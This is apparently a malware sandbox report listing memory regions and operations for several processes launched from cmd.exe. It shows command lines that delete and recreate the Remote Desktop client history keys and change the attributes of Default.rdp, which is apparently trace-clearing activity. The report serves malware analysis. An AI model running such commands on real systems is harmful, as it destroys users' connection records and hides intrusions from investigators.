locale.nls	0x051a0000	0x0525dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000005260000	0x05260000	0x0529ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000053e0000	0x053e0000	0x053effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000053f0000	0x053f0000	0x05577fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000005580000	0x05580000	0x05700fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000005710000	0x05710000	0x06b0ffff	Pagefile Backed Memory	Readable	Region Actions
rsaenh.dll	0x73e70000	0x73e9efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x73ea0000	0x73ebafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73ec0000	0x73ed2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vssapi.dll	0x73ee0000	0x73ffafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vsstrace.dll	0x74000000	0x74010fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x74020000	0x74037fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x74150000	0x741e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x74410000	0x74491fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x745b0000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x746e0000	0x746ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75fd0000	0x75fd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x76040000	0x761f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76960000	0x76a9ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76aa0000	0x76acafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76c00000	0x76c43fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76e80000	0x76edbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76f40000	0x7708cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007e010000	0x7e010000	0x7e10ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007e110000	0x7e110000	0x7e132fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007e138000	0x7e138000	0x7e13afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e13b000	0x7e13b000	0x7e13dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e13e000	0x7e13e000	0x7e13efff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e13f000	0x7e13f000	0x7e13ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Process #17: reg.exe

(Host: 15, Network: 0)

Information	Value
ID	#17
File Name	c:\windows\syswow64\reg.exe
Command Line	reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19

OS Process Information

Information	Value
PID	0xe8c
Parent PID	0xe40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E90 0x E94

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x00000000005e0000	0x005e0000	0x005fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000005e0000	0x005e0000	0x005effff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000005f0000	0x005f0000	0x005f3fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000600000	0x00600000	0x00601fff	Private Memory	Readable, Writable	Region Actions
reg.exe.mui	0x00600000	0x00609fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x00623fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000630000	0x00630000	0x0066ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x006b3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006c0000	0x006c0000	0x006c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000006d0000	0x006d0000	0x006d1fff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x006e0000	0x0079dfff	Memory Mapped File	Readable	Region Actions
private_0x00000000007a0000	0x007a0000	0x007dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007e0000	0x007e0000	0x007effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007f0000	0x007f0000	0x0082ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000008f0000	0x008f0000	0x008fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000940000	0x00940000	0x00a3ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x00a40000	0x00d76fff	Memory Mapped File	Readable	Region Actions
reg.exe	0x00e30000	0x00e82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000e90000	0x00e90000	0x04e8ffff	Pagefile Backed Memory	-	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75fd0000	0x75fd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76e80000	0x76edbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007e190000	0x7e190000	0x7e28ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007e290000	0x7e290000	0x7e2b2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007e2b4000	0x7e2b4000	0x7e2b4fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e2b7000	0x7e2b7000	0x7e2b7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e2ba000	0x7e2ba000	0x7e2bcfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e2bd000	0x7e2bd000	0x7e2bffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xe90

(Host: 15, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\reg.exe, base_address = 0xe30000	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 7	1	Fn Data
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 67	1	Fn Data

Process #18: reg.exe

(Host: 15, Network: 0)

Information	Value
ID	#18
File Name	c:\windows\syswow64\reg.exe
Command Line	reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19

OS Process Information

Information	Value
PID	0xe98
Parent PID	0xe40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E9C 0x EA0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000980000	0x00980000	0x0099ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000980000	0x00980000	0x0098ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000990000	0x00990000	0x00993fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000009a0000	0x009a0000	0x009a1fff	Private Memory	Readable, Writable	Region Actions
reg.exe.mui	0x009a0000	0x009a9fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000009b0000	0x009b0000	0x009c3fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000009d0000	0x009d0000	0x00a0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000a10000	0x00a10000	0x00a4ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000a50000	0x00a50000	0x00a53fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a60000	0x00a60000	0x00a60fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000a70000	0x00a70000	0x00a71fff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00a80000	0x00b3dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000b40000	0x00b40000	0x00b7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000b80000	0x00b80000	0x00bbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000bc0000	0x00bc0000	0x00bcffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000c20000	0x00c20000	0x00c2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000c40000	0x00c40000	0x00d3ffff	Private Memory	Readable, Writable	Region Actions
reg.exe	0x00e30000	0x00e82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000e90000	0x00e90000	0x04e8ffff	Pagefile Backed Memory	-	Region Actions
sortdefault.nls	0x04e90000	0x051c6fff	Memory Mapped File	Readable	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75fd0000	0x75fd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76e80000	0x76edbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007e470000	0x7e470000	0x7e56ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007e570000	0x7e570000	0x7e592fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007e593000	0x7e593000	0x7e593fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e596000	0x7e596000	0x7e596fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e59a000	0x7e59a000	0x7e59cfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e59d000	0x7e59d000	0x7e59ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xe9c

(Host: 15, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\reg.exe, base_address = 0xe30000	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 7	1	Fn Data
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 67	1	Fn Data

Process #19: reg.exe

(Host: 11, Network: 0)

Information	Value
ID	#19
File Name	c:\windows\syswow64\reg.exe
Command Line	reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19

OS Process Information

Information	Value
PID	0xea4
Parent PID	0xe40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EA8 0x EAC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000550000	0x00550000	0x0056ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x0055ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000560000	0x00560000	0x00563fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000570000	0x00570000	0x00571fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00593fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005a0000	0x005a0000	0x005dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005e0000	0x005e0000	0x0061ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000620000	0x00620000	0x00623fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000630000	0x00630000	0x00630fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000640000	0x00640000	0x00641fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000680000	0x00680000	0x0068ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00690000	0x0074dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000750000	0x00750000	0x0078ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000790000	0x00790000	0x007cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000820000	0x00820000	0x0091ffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x00920000	0x009fefff	Memory Mapped File	Readable	Region Actions
private_0x0000000000a80000	0x00a80000	0x00a8ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x00a90000	0x00dc6fff	Memory Mapped File	Readable	Region Actions
reg.exe	0x00e30000	0x00e82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000e90000	0x00e90000	0x04e8ffff	Pagefile Backed Memory	-	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75fd0000	0x75fd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76e80000	0x76edbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007ede0000	0x7ede0000	0x7eedffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007eee0000	0x7eee0000	0x7ef02fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ef08000	0x7ef08000	0x7ef0afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef0b000	0x7ef0b000	0x7ef0dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef0e000	0x7ef0e000	0x7ef0efff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef0f000	0x7ef0f000	0x7ef0ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xea8

(Host: 11, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\reg.exe, base_address = 0xe30000	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers, size = 2, type = REG_SZ	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 39	1	Fn Data

Process #20: attrib.exe

Information	Value
ID	#20
File Name	c:\windows\syswow64\attrib.exe
Command Line	attrib Default.rdp -s -h
Initial Working Directory	C:\Users\CIiHmnxMn6Ps\Documents\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xeb0
Parent PID	0xe40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EB4 0x EB8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000610000	0x00610000	0x0062ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x0061ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000620000	0x00620000	0x00623fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000630000	0x00630000	0x00631fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000630000	0x00630000	0x00633fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x00653fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000660000	0x00660000	0x0069ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006a0000	0x006a0000	0x006dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006e0000	0x006e0000	0x006e3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x006f0fff	Pagefile Backed Memory	Readable	Region Actions
